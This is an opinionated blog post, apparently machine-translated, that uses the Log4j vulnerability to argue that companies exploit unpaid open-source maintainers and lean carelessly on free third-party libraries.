May 2, 2024

The mountain of shit theory

Uriel Fanelli's blog in English

Fediverse

Log4j, Log4j… the ceiling you dirty me.

Uriel Fanelli 0 Comments

Log4j, Log4j ... the ceiling you dirty me.

The new bug in a library widely used in the Java world, for the sole purpose of writing strings to a file, is causing a sensation in the IT world. In practice, instead of using fprintf (), our heroes had invented a catastrophic bier of enormous complexity, with the result that at some point they lost control of it.

“Our heroes” were those “Full Stack Exchange Developers” who when asked how it is best to log in were told “use log4j, why learn to write strings to a file? It could explode your brain! ". I mean the average programmer of today.

The result is that someone has written a software that interprets them to write the logs. It does things. And if you tell it to log a specific string, it interprets it and goes to call an ldap server which, among the attributes, provides it with code to execute.

But even so, we better try to understand why this is still going to happen.

In itself, it is an opensource software. And in theory, being an opensource software, a robust community of developers, being able to read the code, is expected to easily fix vulnerabilities. What is the robust developer community called? It is called "Ralph Goers". ( https://www.ralphgoers.com/ )

Log4j, Log4j ... the ceiling you dirty me.

The “nourished community” is a person who does log4j in his spare time, after work.

Wow.

Are you paid to do it? No. He might say "sorry, I'm on the beach, it's my vacation, I'll be back next month, if my software doesn't work stop using it until I'm back". And there would be nothing strange about it.

This isn't the first time this has happened, and it won't be the last.

Years ago the developer of GPG said that because he wanted to eat three times a day he intended to find a well-paying job, and therefore would suspend development of the software on which much of Linux's userspace encryption is based. Only then did some companies realize they had some loose change and found a way to pay him a salary for what he did.

Soon after, it was discovered that OpenSSL, the other leg of opensource encryption, had a memory explode problem. And it turned out that everything was done by 3 programmers who worked for OpenBSD, obviously not paid or paid a shit, in their free time.

So, the pattern is clear:

Log4j, Log4j ... the ceiling you dirty me.

But it would be better, to ALSO explain the problem, use THIS image:

Log4j, Log4j ... the ceiling you dirty me.

Because that's EXACTLY the problem.

Large companies make excessive use of opensource software. And they don't do it because it is better or because it is safer: they do it because it COST NOTHING.

Instead of buying licenses, managers say “use linux, it's free”.

When the opensource movement was born, programmers counted, or hoped, for a model similar to the previous shareware, that is, "some will like it and send us money, others will help improve it, others will spread it".

But the reality is that they have become "the idiots who work for free". So it can happen that in the Microsoft cloud the vast majority of virtual machines are made from Linux images. Microsoft makes us billions. Have any of the Linux developers ever seen even a fraction of those billions? Obviously not.

Then you will tell me that there are foundations that receive great donations from large companies, and my question is: ok. But I'm talking about programmers. Do they get this money?

The answer is in the Mozilla Foundation and its balance sheet. If you haven't followed the whole story, the usual managerz are overpaid while the programmers are treated like shit.

For companies, open source has become the world where there are idiots who work for free, get treated like shit and even take insults if they make a mistake, and it costs them nothing.

The result is programmers less and less happy to program. Another case was the Metallb programmer (at the time the only one), who received a threat of being sued for damages if he didn't fix a bug by the end of the weekend. And he replied that he worked on it in his spare time, that he was pissing off people who thought they could treat him like a rag and were thinking of quitting.

As without metal half of the "Kubernetes experts" shoot themselves in the mouth, other people jumped out to help him and the company in question received so much of that hatred from the internet that they preferred to apologize. But the point remains the same: for many managers, opensource software is made by fools who work for free, and since they work for you, and since they work for you you can also treat them like shit.

This software did a very simple thing: write the logs of an application in a certain format. In a c-like language, it was the equivalent of fprinf (). Since learning fprintf () is too difficult for the average monkey, so many preferred to use that: so it ended up everywhere, or almost. Moral: a mess.

Such rubbish exists in almost all languages ​​by now, and mainly serves to prevent a programmer from struggling to learn standard libraries that already do the same thing.

And then we have:

  • Commons I.
  • Guava
  • JUnit
  • Jackson
  • JAXB
  • AssertJ
  • Hibernate
  • HTTPComponents
  • Xerces2
  • Javassist
  • CgLib
  • Jms
  • SQM
  • Joda (I miss the dates …)
  • Finds
  • Jsoup
  • Netty / MINA

Almost all languages ​​now have this kind of proliferation of third party libraries, and each of these has a different origin, a different lifecycle, and obviously an equal chance of being "infected".

What's going wrong?

Well, this happens. Imagine you are a woman. You have to have a child. The manager comes and says “they cut our budget. from today the children are made in 8 months ". Now, with the new low cost cesarean section technique, it's quite feasible. It's not cool, but it's doable.

The following year same thing. Now you have to do it in 7 months. Again, with a little bit of incubator and cutting, it can be done.

But by dint of "increasing productivity simply by promising the customer shorter deadlines", it has happened that our woman will go to orphanages to stock up on children.

If once the manager believed that nine women could have a child in a month, today someone convinced them that ONE woman can have a child in a month if she does DevOps, has a CI / CD, and the child is opensource.

In practice, ONE programmer is asked to work in parallel.

Once this is done, programmers simply download libraries. This is also due to a certain lack of creativity on the part of companies, which all ask for the same thing in the same way.

The project times are calculated with such arrogance and superficiality that today they would ask God to make the universe in three days. And no, “Agile / Scrum” only made it worse.

This continuous compression of costs without REALLY technologies to make development more productive means that the most followed strategy is to reuse software written by others. It's free.

With the result that we will spend the next 15 years, as IT becomes more crucial and used for really important things, to find out how many errors and how many security problems derive from the blind adoption of libraries that yes, will also be opensource, but no programmer has ever thoroughly investigated WHY HAD NO TIME.

The next 15 years of IT adoption will be a period of periodic data leaks, hackers penetrating systems, exponential increases in cybersecurity spending, ransomware and more.

Because there is no such thing as a free meal, and if you save a month in your project using a library that you download for free, sooner or later it will cost you exactly that amount to fix that library's flaws.

Leave a Reply

Your email address will not be published. Required fields are marked *

Create a website and earn with Altervista - Disclaimer - Report Abuse - Privacy Policy - Customize advertising tracking